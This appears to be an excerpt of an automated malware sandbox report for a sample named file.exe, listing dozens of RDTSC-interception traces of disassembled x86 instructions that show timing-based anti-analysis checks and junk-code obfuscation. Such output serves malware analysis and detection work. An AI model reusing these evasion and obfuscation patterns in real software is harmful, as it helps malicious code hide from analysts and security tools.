                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1BE77 second address: E1BF05 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007FE478BEC546h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jns 00007FE478BEC550h 0x00000013 nop 0x00000014 jnl 00007FE478BEC546h 0x0000001a push dword ptr fs:[00000000h] 0x00000021 mov dword ptr [ebp+1247850Ch], ecx 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007FE478BEC548h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 mov eax, dword ptr [ebp+122D04E5h] 0x0000004e push 00000000h 0x00000050 push ebx 0x00000051 call 00007FE478BEC548h 0x00000056 pop ebx 0x00000057 mov dword ptr [esp+04h], ebx 0x0000005b add dword ptr [esp+04h], 00000018h 0x00000063 inc ebx 0x00000064 push ebx 0x00000065 ret 0x00000066 pop ebx 0x00000067 ret 0x00000068 mov edi, dword ptr [ebp+122D3827h] 0x0000006e push FFFFFFFFh 0x00000070 push eax 0x00000071 push eax 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E255AC second address: E255B6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE478F58EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E255B6 second address: E255BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E237AD second address: E237B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E237B3 second address: E237B8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E267C5 second address: E267E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E267E1 second address: E267E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E267E5 second address: E267EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E267EB second address: E267F0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2873F second address: E28743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E276B0 second address: E276BD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE478BEC546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E277A2 second address: E277B0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E277B0 second address: E277B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30618 second address: E30622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE478F58EB6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30622 second address: E3062E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3062E second address: E30632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30A60 second address: E30A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E35120 second address: E35137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE478F58EBCh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E35137 second address: E35154 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE478BEC54Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007FE478BEC546h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E35154 second address: E3518E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE478F58EC6h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007FE478F58EBFh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push edx 0x0000001b pop edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E351FA second address: E351FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E351FE second address: E35227 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE478F58EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c jbe 00007FE478F58EC0h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jo 00007FE478F58EC0h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E352D5 second address: E352DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3535E second address: C5DABD instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE478F58EBCh 0x00000008 je 00007FE478F58EB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xor dword ptr [esp], 15C7D9D3h 0x00000017 jmp 00007FE478F58EC5h 0x0000001c push dword ptr [ebp+122D0801h] 0x00000022 jmp 00007FE478F58EC1h 0x00000027 call dword ptr [ebp+122D1907h] 0x0000002d pushad 0x0000002e cld 0x0000002f pushad 0x00000030 mov esi, 455831ACh 0x00000035 mov ecx, dword ptr [ebp+122D393Fh] 0x0000003b popad 0x0000003c xor eax, eax 0x0000003e jno 00007FE478F58EC8h 0x00000044 sub dword ptr [ebp+122D1BC5h], esi 0x0000004a mov edx, dword ptr [esp+28h] 0x0000004e or dword ptr [ebp+122D1BC5h], eax 0x00000054 mov dword ptr [ebp+122D37EBh], eax 0x0000005a jno 00007FE478F58EB7h 0x00000060 mov esi, 0000003Ch 0x00000065 sub dword ptr [ebp+122D1BC5h], ebx 0x0000006b add esi, dword ptr [esp+24h] 0x0000006f pushad 0x00000070 mov di, bx 0x00000073 add dh, 00000020h 0x00000076 popad 0x00000077 lodsw 0x00000079 pushad 0x0000007a movsx eax, di 0x0000007d mov ebx, dword ptr [ebp+122D399Bh] 0x00000083 popad 0x00000084 add eax, dword ptr [esp+24h] 0x00000088 add dword ptr [ebp+122D1BC5h], edi 0x0000008e mov ebx, dword ptr [esp+24h] 0x00000092 pushad 0x00000093 cld 0x00000094 sub dword ptr [ebp+122D1BC5h], ecx 0x0000009a popad 0x0000009b jmp 00007FE478F58EBEh 0x000000a0 push eax 0x000000a1 push esi 0x000000a2 push eax 0x000000a3 push edx 0x000000a4 push edi 0x000000a5 pop edi 0x000000a6 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3A86D second address: E3A871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3A871 second address: E3A88D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE478F58EB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jng 00007FE478F58EB6h 0x00000013 je 00007FE478F58EB6h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3A88D second address: E3A892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3AFF8 second address: E3AFFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3AFFC second address: E3B005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B005 second address: E3B013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B575 second address: E3B57F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE478BEC546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B99A second address: E3B9B0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE478F58EBAh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jbe 00007FE478F58EB6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3FADC second address: E3FAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3FAE0 second address: E3FAEA instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE478F58EB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3FAEA second address: E3FAF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3FAF0 second address: E3FB1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FE478F58EBCh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8E3C second address: DD8E50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jns 00007FE478BEC546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007FE478BEC54Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E453E1 second address: E453EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FE478F58EB6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44174 second address: E4417E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4417E second address: E4418B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4418B second address: E4418F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF6696 second address: DF66A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FE478F58EB6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4444A second address: E4445F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FE478BEC546h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FE478BEC546h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4445F second address: E44463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44463 second address: E444B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FE478BEC54Eh 0x0000000e pushad 0x0000000f jmp 00007FE478BEC558h 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FE478BEC558h 0x0000001b js 00007FE478BEC546h 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4476F second address: E44774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44774 second address: E44779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44779 second address: E44787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE478F58EB6h 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44E55 second address: E44E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44E59 second address: E44E7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE478F58EC4h 0x00000009 jmp 00007FE478F58EBEh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44E7F second address: E44EA6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE478BEC546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FE478BEC557h 0x00000010 jmp 00007FE478BEC551h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4800D second address: E4801A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4801A second address: E48030 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE478BEC546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FE478BEC54Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E48030 second address: E4803A instructions: 0x00000000 rdtsc 0x00000002 je 00007FE478F58EBEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD59EA second address: DD5A01 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FE478BEC551h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B58E second address: E4B592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E15CB5 second address: E15D0B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE478BEC558h 0x00000008 jmp 00007FE478BEC552h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FE478BEC548h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a lea eax, dword ptr [ebp+1248B9E0h] 0x00000030 sub dword ptr [ebp+122D1816h], esi 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push ebx 0x0000003a jns 00007FE478BEC546h 0x00000040 pop ebx 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E15D0B second address: DF6682 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE478F58EB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FE478F58EB8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov edx, dword ptr [ebp+122D18F5h] 0x0000002d mov dword ptr [ebp+124688F0h], ecx 0x00000033 sub dword ptr [ebp+122D193Bh], ecx 0x00000039 call dword ptr [ebp+122D18DBh] 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FE478F58EC4h 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E16234 second address: E16241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FE478BEC546h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E16241 second address: E16258 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jnl 00007FE478F58EB6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E16258 second address: E1625C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1625C second address: E16260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1667C second address: E16686 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE478BEC546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E16686 second address: E166AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE478F58EBFh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1708A second address: E1709D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE478BEC54Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1709D second address: E170F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b add edx, dword ptr [ebp+122D3673h] 0x00000011 lea eax, dword ptr [ebp+1248BA24h] 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FE478F58EB8h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 mov edi, 1FF34DC9h 0x00000036 nop 0x00000037 push eax 0x00000038 jl 00007FE478F58EBCh 0x0000003e jl 00007FE478F58EB6h 0x00000044 pop eax 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push ecx 0x00000049 jc 00007FE478F58EB6h 0x0000004f pop ecx 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E170F7 second address: E17107 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE478BEC54Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17107 second address: E17168 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE478F58EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov cx, 3863h 0x00000011 jmp 00007FE478F58EBEh 0x00000016 lea eax, dword ptr [ebp+1248B9E0h] 0x0000001c or dword ptr [ebp+122D2116h], edx 0x00000022 push esi 0x00000023 pop edi 0x00000024 nop 0x00000025 pushad 0x00000026 push ecx 0x00000027 jmp 00007FE478F58EC4h 0x0000002c pop ecx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 push edx 0x00000031 pop edx 0x00000032 popad 0x00000033 popad 0x00000034 push eax 0x00000035 pushad 0x00000036 jmp 00007FE478F58EBFh 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17168 second address: E1716C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1716C second address: DF7135 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FE478F58EB8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 sub dword ptr [ebp+122D2BD0h], ecx 0x00000028 mov dl, 43h 0x0000002a call dword ptr [ebp+122D27D8h] 0x00000030 push eax 0x00000031 push edx 0x00000032 jbe 00007FE478F58EB8h 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF7135 second address: DF7178 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop ebx 0x00000008 jmp 00007FE478BEC550h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jg 00007FE478BEC54Ch 0x00000016 jl 00007FE478BEC546h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FE478BEC558h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF7178 second address: DF71B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FE478F58ECFh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD3F9E second address: DD3FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD3FA4 second address: DD3FA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD3FA8 second address: DD3FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD3FB0 second address: DD3FBA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE478F58EBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4B85B second address: E4B865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FE478BEC546h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4B865 second address: E4B86B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4B86B second address: E4B871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4B871 second address: E4B882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007FE478F58EB6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4B882 second address: E4B886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4B886 second address: E4B89A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
